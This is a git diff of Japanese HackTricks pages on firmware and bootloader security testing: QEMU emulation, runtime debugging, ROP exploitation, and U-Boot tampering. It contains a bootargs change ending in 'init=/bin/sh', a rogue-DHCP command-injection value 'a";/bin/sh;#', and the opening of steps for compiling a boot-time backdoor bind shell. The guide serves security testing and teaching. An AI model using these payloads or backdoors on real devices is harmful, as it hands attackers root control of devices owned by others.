||||
```bash
|
||||
qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls
|
||||
100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0
|
||||
```
|
||||
#### ARMの例
|
||||
|
||||
```html
|
||||
<details>
|
||||
<summary>Click to expand!</summary>
|
||||
|
||||
##### Firmware Analysis
|
||||
|
||||
- **Firmware Extraction**: The first step in firmware analysis is to extract the firmware from the target device. This can be done by using tools like `binwalk`, `firmware-mod-kit`, or by directly accessing the device's memory.
|
||||
|
||||
- **Firmware Reverse Engineering**: Once the firmware is extracted, it can be reverse engineered to understand its inner workings. Tools like `IDA Pro`, `Ghidra`, or `Radare2` can be used for this purpose.
|
||||
|
||||
- **Firmware Vulnerability Analysis**: After reverse engineering, the firmware can be analyzed for vulnerabilities. This involves identifying potential security flaws, such as buffer overflows, format string vulnerabilities, or hardcoded credentials.
|
||||
|
||||
- **Firmware Patching**: If vulnerabilities are found, patches can be developed to fix them. These patches can be applied to the firmware to enhance its security.
|
||||
|
||||
- **Firmware Emulation**: Emulating the firmware can help in understanding its behavior without running it on the actual device. Tools like `QEMU` or `Unicorn` can be used for firmware emulation.
|
||||
|
||||
- **Firmware Debugging**: Debugging the firmware can provide insights into its execution flow and help in identifying vulnerabilities. Tools like `GDB` or `OllyDbg` can be used for firmware debugging.
|
||||
|
||||
- **Firmware Exploitation**: Exploiting vulnerabilities in the firmware can lead to unauthorized access or control over the target device. Techniques like stack smashing, return-oriented programming (ROP), or code injection can be used for firmware exploitation.
|
||||
|
||||
</details>
|
||||
```
|
||||
|
||||
#### ARMの例
|
||||
|
||||
```html
|
||||
<details>
|
||||
<summary>クリックして展開する!</summary>
|
||||
|
||||
##### ファームウェア解析
|
||||
|
||||
- **ファームウェアの抽出**: ファームウェア解析の最初のステップは、対象デバイスからファームウェアを抽出することです。これは、`binwalk`、`firmware-mod-kit`などのツールを使用するか、デバイスのメモリに直接アクセスすることで行うことができます。
|
||||
|
||||
- **ファームウェアの逆アセンブリ**: ファームウェアが抽出されたら、その内部動作を理解するために逆アセンブリすることができます。この目的のために、`IDA Pro`、`Ghidra`、`Radare2`などのツールを使用することができます。
|
||||
|
||||
- **ファームウェアの脆弱性分析**: 逆アセンブリ後、ファームウェアは脆弱性の分析のために調査されます。これには、バッファオーバーフロー、フォーマット文字列の脆弱性、ハードコードされた認証情報などの潜在的なセキュリティ上の問題の特定が含まれます。
|
||||
|
||||
- **ファームウェアのパッチ適用**: 脆弱性が見つかった場合、それらを修正するためのパッチを開発することができます。これらのパッチは、ファームウェアに適用してセキュリティを強化することができます。
|
||||
|
||||
- **ファームウェアのエミュレーション**: ファームウェアのエミュレーションは、実際のデバイス上で実行せずにその動作を理解するのに役立ちます。`QEMU`や`Unicorn`などのツールを使用してファームウェアのエミュレーションを行うことができます。
|
||||
|
||||
- **ファームウェアのデバッグ**: ファームウェアのデバッグは、実行フローを分析し、脆弱性の特定に役立ちます。`GDB`や`OllyDbg`などのツールを使用してファームウェアのデバッグを行うことができます。
|
||||
|
||||
- **ファームウェアの攻撃**: ファームウェアの脆弱性を悪用することで、対象デバイスへの不正アクセスや制御を行うことができます。スタックスマッシング、リターンオリエンテッドプログラミング(ROP)、コードインジェクションなどの技術を使用してファームウェアの攻撃を行うことができます。
|
||||
|
||||
</details>
|
||||
```
|
||||
```bash
|
||||
file bin/busybox
|
||||
bin/busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-armhf.so.1, no section header
|
||||
|
@ -279,53 +229,53 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
|
|||
```
|
||||
### フルシステムエミュレーション
|
||||
|
||||
一部のツールは、一般的に**qemu**をベースにしており、完全なファームウェアをエミュレートすることができます。
|
||||
以下のツールは、一般的に**qemu**に基づいており、完全なファームウェアをエミュレートすることができます:
|
||||
|
||||
* [**https://github.com/firmadyne/firmadyne**](https://github.com/firmadyne/firmadyne)**:**
|
||||
* ファームウェアを抽出するためにextractor.pyスクリプトを実行し、getArch.shスクリプトを使用してアーキテクチャを取得するために、いくつかのものをインストールし、postgresを設定する必要があります。次に、tar2db.pyおよびmakeImage.shスクリプトを使用して、抽出したイメージからの情報をデータベースに保存し、エミュレートできるQEMUイメージを生成します。次に、ネットワークインターフェースを取得するためにinferNetwork.shスクリプトを使用し、最後に./scratch/1/folderに自動的に作成されるrun.shスクリプトを使用します。
|
||||
* 複数のインストールが必要で、postgresを設定した後、extractor.pyスクリプトを実行してファームウェアを抽出し、getArch.shスクリプトを使用してアーキテクチャを取得します。次に、tar2db.pyとmakeImage.shスクリプトを使用して、抽出されたイメージからデータベースに情報を格納し、エミュレートできるQEMUイメージを生成します。その後、inferNetwork.shスクリプトを使用してネットワークインターフェースを取得し、最後に./scratch/1/folderに自動的に作成されるrun.shスクリプトを使用します。
|
||||
* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:**
|
||||
* このツールはfirmadyneに依存しており、firmadyneを使用してファームウェアをエミュレートするプロセスを自動化します。使用する前に`fat.config`を設定する必要があります:`sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0`
|
||||
* このツールはfirmadyneに依存しており、firmadyneeを使用してファームウェアのエミュレーションプロセスを自動化します。使用する前に`fat.config`を設定する必要があります:`sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0`
|
||||
* [**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux)
|
||||
* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X)
|
||||
* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool)
|
||||
|
||||
## **動的解析**
|
||||
## **動的分析**
|
||||
|
||||
この段階では、攻撃対象のファームウェアを実行しているデバイスまたはエミュレートされたファームウェアを攻撃するために、**実行中のOSとファイルシステムにシェルがあることが強く推奨されます**。
|
||||
この段階では、攻撃するファームウェアを実行しているデバイスか、エミュレートされているファームウェアがあるべきです。いずれの場合も、**OSとファイルシステムにシェルがあることが強く推奨されます**。
|
||||
|
||||
ファームウェアをエミュレートしている場合、**エミュレーション内の一部のアクティビティが失敗する**ことがあり、エミュレーションを再起動する必要があるかもしれません。たとえば、ウェブアプリケーションは、元のデバイスが統合されているデバイスから情報を取得する必要があるかもしれませんが、エミュレーションではそれをエミュレートしていません。
|
||||
エミュレーション内での**一部の活動が失敗する**ことがあり、エミュレーションを再起動する必要があるかもしれません。例えば、ウェブアプリケーションがオリジナルのデバイスと統合されているデバイスから情報を取得する必要があるが、エミュレーションではそれをエミュレートしていない場合です。
|
||||
|
||||
実行環境では、新しい情報にアクセスできる可能性があるため、**ファイルシステムを再確認する必要があります**。
|
||||
**ファイルシステムを再確認する**べきです。**以前のステップで行ったように、実行環境では新しい情報がアクセス可能になるかもしれません。**
|
||||
|
||||
**ウェブページ**が公開されている場合、コードを読み、アクセスできるようになったら、それらを**テスト**する必要があります。hacktricksでは、さまざまなウェブハッキングテクニックに関する多くの情報を見つけることができます。
|
||||
**ウェブページ**が公開されている場合、コードを読んでアクセスできるようになったら、**テストする**べきです。HackTricksでは、さまざまなウェブハッキング技術に関する多くの情報を見つけることができます。
|
||||
|
||||
**ネットワークサービス**が公開されている場合、それらを攻撃しようとする必要があります。hacktricksでは、さまざまなネットワークサービスのハッキングテクニックに関する多くの情報を見つけることができます。また、[Mutiny](https://github.com/Cisco-Talos/mutiny-fuzzer)、[boofuzz](https://github.com/jtpereyda/boofuzz)、および[kitty](https://github.com/cisco-sas/kitty)などのネットワークおよびプロトコルのファジングツールを使用して、それらをファズすることもできます。
|
||||
**ネットワークサービス**が公開されている場合、攻撃を試みるべきです。HackTricksでは、さまざまなネットワークサービスのハッキング技術に関する多くの情報を見つけることができます。また、[Mutiny](https://github.com/Cisco-Talos/mutiny-fuzzer)、[boofuzz](https://github.com/jtpereyda/boofuzz)、[kitty](https://github.com/cisco-sas/kitty)などのネットワークおよびプロトコル**ファジャー**を使用してファズテストを試みることもできます。
|
||||
|
||||
ブートローダを攻撃してルートシェルを取得できるかどうかを確認する必要があります:
|
||||
**ブートローダーを攻撃**してrootシェルを取得できるかどうかを確認するべきです:
|
||||
|
||||
{% content-ref url="bootloader-testing.md" %}
|
||||
[bootloader-testing.md](bootloader-testing.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
デバイスがいかなる種類の**ファームウェア整合性テスト**を行っているかをテストする必要があります。そうでない場合、攻撃者はバックドア付きのファームウェアを提供したり、他の人が所有するデバイスにそれをインストールしたり、ファームウェアの更新に脆弱性がある場合はリモートで展開したりすることができます:
|
||||
デバイスが**ファームウェアの整合性テスト**を行っているかどうかをテストするべきです。そうでない場合、攻撃者はバックドア付きのファームウェアを提供し、他人が所有するデバイスにインストールしたり、ファームウェアのアップデートの脆弱性がある場合はリモートで展開することができます:
|
||||
|
||||
{% content-ref url="firmware-integrity.md" %}
|
||||
[firmware-integrity.md](firmware-integrity.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
ファームウェアの更新の脆弱性は、ファームウェアの**整合性**が**検証されない**、**暗号化されていない** **ネットワーク**プロトコルの使用、**ハードコードされた** **資格情報**の使用、クラウドコンポーネントへの**安全でない認証**、および過剰で安全でない**ロギング**(機密データ)などが原因です。また、検証なしで**物理的な更新**を許可します。
|
||||
ファームウェアのアップデートの脆弱性は通常、**ファームウェア**の**整合性**が**検証されていない**、**暗号化されていない** **ネットワーク**プロトコルを使用している、**ハードコードされた** **クレデンシャル**の使用、ファームウェアをホストするクラウドコンポーネントへの**不安全な認証**、過度で不安全な**ログ記録**(機密データ)、検証なしに**物理的なアップデート**を許可することなどが原因で発生します。
|
||||
|
||||
## **ランタイム解析**
|
||||
## **ランタイム分析**
|
||||
|
||||
ランタイム解析では、デバイスが通常の環境またはエミュレートされた環境で実行されている間に、実行中のプロセスまたはバイナリにアタッチします。基本的なランタイム解析の手順は以下の通りです:
|
||||
ランタイム分析には、デバイスが通常の環境またはエミュレートされた環境で実行中のときに、実行中のプロセスまたはバイナリにアタッチすることが含まれます。基本的なランタイム分析手順は以下の通りです:
|
||||
|
||||
1. `sudo chroot . ./qemu-arch -L <optionalLibPath> -g <gdb_port> <binary>`
|
||||
2. gdb-multiarchをアタッチするか、IDAを使用してバイナリをエミュレートします
|
||||
3. memcpy、strncpy、strcmpなどのステップ4で特定された関数にブレークポイントを設定します。
|
||||
4. ファズツールを使用して、オーバーフローやプロセスのクラッシュを特定するために、大きなペイロード文字列を実行します。
|
||||
5. 脆弱性が特定された場合は、ステップ8に進んでください。
|
||||
2. gdb-multiarchにアタッチするか、IDAを使用してバイナリをエミュレートする
|
||||
3. memcpy、strncpy、strcmpなど、ステップ4で特定された関数にブレークポイントを設定する
|
||||
4. ファジャーを使用してオーバーフローやプロセスクラッシュを特定するために大きなペイロード文字列を実行する
|
||||
5. 脆弱性が特定された場合はステップ8に進む
|
||||
|
||||
役立つツール(非網羅的)は次のとおりです:
|
||||
役立つツールは以下の通りです(網羅的ではありません):
|
||||
|
||||
* gdb-multiarch
|
||||
* [Peda](https://github.com/longld/peda)
|
||||
|
@ -337,18 +287,25 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
|
|||
* Binary Ninja
|
||||
* Hopper
|
||||
|
||||
## **バイナリの攻撃**
|
||||
## **バイナリエクスプロイト**
|
||||
|
||||
前の手順でバイナリ内の脆弱性を特定した後、実世界の影響とリスクを示すために適切な概念実証(PoC)が必要です。エクスプロイトコードの開発には、低レベルの言語(ASM、C/C++、シェルコードなど)でのプログラミング経験と、特定のターゲットアーキテクチャ(MIPS、ARM、x86など)の背景が必要です。PoCコードは、メモリ内の命令を制御することによって、デバイスまたはアプリケーションで任意の実行を取得することを目的としています。
|
||||
前のステップでバイナリ内の脆弱性を特定した後、実際の影響とリスクを示すために適切な実証コンセプト(PoC)が必要です。エクスプロイトコードの開発には、低レベル言語(例:ASM、C/C++、シェルコードなど)でのプログラミング経験と、特定のターゲットアーキテクチャ(例:MIPS、ARM、x86など)に関する知識が必要です。PoCコードには、メモリ内の命令を制御することでデバイスやアプリケーション上で任意の実行を得ることが含まれます。
|
||||
|
||||
組み込みシステムでは、バイナリのランタイム保護(NX、DEP、ASLRなど)が一般的には行われないことが一般的ですが、これが発生する場合、ROP(Return Oriented Programming)などの追加のテクニックが必要になる場合があります。ROPは、既存のコードを連鎖させることによって、ターゲットプロセス/バイナリのコード内に任意の悪意のある機能を実装することを攻撃者に可能にします。バッファオーバーフローなどの特定された脆弱性を悪用するためには、ROPチェーンを形成するための手順を踏む必要があります。このような状況に役立つツールとしては、CapstoneのガジェットファインダーやROPGadget- [https://github.com/JonathanSalwan/ROPgadget](https://github.com/JonathanSalwan/ROPgadget)があります。
|
||||
組み込みシステム内でバイナリランタイム保護(例:NX、DEP、ASLRなど)が存在することは一般的ではありませんが、発生した場合、リターン指向プログラミング(ROP)などの追加技術が必要になることがあります。ROPを使用すると、攻撃者はターゲットプロセス/バイナリのコード内に既存のコードをチェーンして、ガジェットとして知られる任意の悪意のある機能を実装することができます。バッファオーバーフローなどの特定された脆弱性を利用するためにROPチェーンを形成する手順が必要になります。このような状況に役立つツールは、CapstoneのガジェットファインダーやROPGadget- [https://github.com/JonathanSalwan/ROPgadget](https://github.com/JonathanSalwan/ROPgadget)です。
|
||||
|
||||
詳しいガイダンスについては、以下の参考文献を利用してください:
|
||||
さらなるガイダンスには以下の参考文献を利用してください:
|
||||
|
||||
* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm
|
||||
## 脆弱なファームウェアの練習
|
||||
* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/)
|
||||
* [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
|
||||
|
||||
ファームウェアの脆弱性を発見するための練習として、以下の脆弱なファームウェアプロジェクトを利用してください。
|
||||
## ファームウェア分析用に準備されたOS
|
||||
|
||||
* [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOSは、IoTデバイスのセキュリティ評価とペネトレーションテストを行うために設計されたディストリビューションです。必要なツールがすべてロードされた事前設定された環境を提供することで、多くの時間を節約できます。
|
||||
* [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Ubuntu 18.04に基づいた組み込みセキュリティテスト用オペレーティングシステムで、ファームウェアセキュリティテストツールがプリロードされています。
|
||||
|
||||
## 練習用の脆弱なファームウェア
|
||||
|
||||
ファームウェアの脆弱性を発見する練習をするために、以下の脆弱なファームウェアプロジェクトを出発点として使用してください。
|
||||
|
||||
* OWASP IoTGoat
|
||||
* [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
|
||||
|
@ -374,16 +331,14 @@ qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls
|
|||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**または**[telegramグループ](https://t.me/peass)**に参加するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの**会社を広告したい、または**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,46 +1,61 @@
|
|||
```markdown
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* あなたの**会社をHackTricksに広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
[https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)からコピー
|
||||
|
||||
デバイスの起動とU-bootなどのブートローダーを変更する場合、次のことを試してみてください:
|
||||
U-bootのようなデバイスの起動とブートローダーを変更する際には、以下のことを試みてください:
|
||||
|
||||
* ブート中に「0」、スペース、または他の特定の「マジックコード」を押してブートローダーのインタプリタシェルにアクセスしようとする。
|
||||
* 設定を変更して、ブート引数の末尾に「`init=/bin/sh`」などのシェルコマンドを実行する。
|
||||
* 起動中に"0"、スペース、または他の特定された「マジックコード」を押して、ブートローダーのインタープリターシェルにアクセスを試みる。
|
||||
* ブート引数の最後に'`init=/bin/sh`'を追加するなどして、シェルコマンドを実行するように設定を変更する。
|
||||
* `#printenv`
|
||||
* `#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh`
|
||||
* `#saveenv`
|
||||
* `#boot`
|
||||
* ワークステーションからネットワーク経由でイメージをロードするためのtftpサーバーをセットアップします。デバイスがネットワークアクセスできることを確認してください。
|
||||
* ワークステーションからローカルにネットワーク経由でイメージをロードするためにtftpサーバーを設定する。デバイスがネットワークアクセスを持っていることを確認する。
|
||||
* `#setenv ipaddr 192.168.2.2 #デバイスのローカルIP`
|
||||
* `#setenv serverip 192.168.2.1 #tftpサーバーのIP`
|
||||
* `#saveenv`
|
||||
* `#reset`
|
||||
* `#ping 192.168.2.1 #ネットワークアクセスが利用可能かどうかを確認する`
|
||||
* `#tftp ${loadaddr} uImage-3.6.35 #loadaddrは2つの引数を取ります:ファイルをロードするアドレスとTFTPサーバー上のイメージのファイル名`
|
||||
* `ubootwrite.py`を使用してubootイメージを書き込み、ルート権限を取得するために変更されたファームウェアをプッシュします。
|
||||
* 次のような有効なデバッグ機能をチェックします:
|
||||
* 冗長なログ記録
|
||||
* 任意のカーネルのロード
|
||||
* 信頼できないソースからのブート
|
||||
* \*注意して使用してください:1つのピンをグラウンドに接続し、デバイスのブートアップシーケンスを監視し、カーネルが展開される前に、グラウンドされたピンをSPIフラッシュチップのデータピン(DO)にショート/接続します。
|
||||
* \*注意して使用してください:1つのピンをグラウンドに接続し、デバイスのブートアップシーケンスを監視し、カーネルが展開される前に、グラウンドされたピンをNANDフラッシュチップのピン8と9にショート/接続します。この時点でU-bootがUBIイメージを展開します。
|
||||
* \*ピンのショート前にNANDフラッシュチップのデータシートを確認してください。
|
||||
* 悪意のあるパラメータを持つローグDHCPサーバーを設定し、デバイスがPXEブート中に入力するようにします。
|
||||
* Metasploit(MSF)のDHCP補助サーバーを使用し、`‘a";/bin/sh;#’`のようなコマンドインジェクションコマンドで「`FILENAME`」パラメータを変更して、デバイスの起動手順の入力検証をテストします。
|
||||
* `#ping 192.168.2.1 #ネットワークアクセスが利用可能か確認する`
|
||||
* `#tftp ${loadaddr} uImage-3.6.35 #loadaddrは2つの引数を取る: ファイルをロードするアドレスとTFTPサーバー上のイメージのファイル名`
|
||||
* `ubootwrite.py`を使用してubootイメージを書き込み、変更されたファームウェアをプッシュしてroot権限を取得する
|
||||
* 以下のような有効なデバッグ機能をチェックする:
|
||||
* 詳細なログ
|
||||
* 任意のカーネルのロード
|
||||
* 信頼されていないソースからのブート
|
||||
* \*注意: 1本のピンをグラウンドに接続し、デバイスの起動シーケンスを観察する。カーネルが解凍される前に、グラウンドされたピンをSPIフラッシュチップのデータピン(DO)に短絡/接続する
|
||||
* \*注意: 1本のピンをグラウンドに接続し、デバイスの起動シーケンスを観察する。カーネルが解凍される前に、グラウンドされたピンをNANDフラッシュチップのピン8と9に短絡/接続する。U-bootがUBIイメージを解凍する瞬間に行う
|
||||
* \*ピンを短絡する前にNANDフラッシュチップのデータシートを確認する
|
||||
* 悪意のあるパラメータを入力としてデバイスが摂取するように設定された不正なDHCPサーバーを構成する
|
||||
* Metasploitの(MSF) DHCP補助サーバーを使用し、`‘a";/bin/sh;#’`のようなコマンドインジェクションコマンドで‘`FILENAME`’パラメータを変更して、デバイスの起動手順の入力検証をテストする。
|
||||
|
||||
\*ハードウェアセキュリティテスト
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* あなたの**会社をHackTricksに広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
|
||||
</details>
|
||||
```
|
||||
|
|
|
@ -1,49 +1,62 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
|
||||
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
### このページは[https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)からコピーされました。
|
||||
### このページは[https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)からコピーされました
|
||||
|
||||
**カスタムファームウェアやコンパイルされたバイナリをアップロード**して、整合性や署名の検証の欠陥を試みます。たとえば、次の手順を使用して、起動時に開始するバックドアバインドシェルをコンパイルします。
|
||||
カスタムファームウェアやコンパイル済みバイナリを**アップロードして**、整合性や署名検証の欠陥を探します。例えば、以下の手順でブート時に起動するバックドアバインドシェルをコンパイルします。
|
||||
|
||||
1. firmware-mod-kit(FMK)を使用してファームウェアを抽出します。
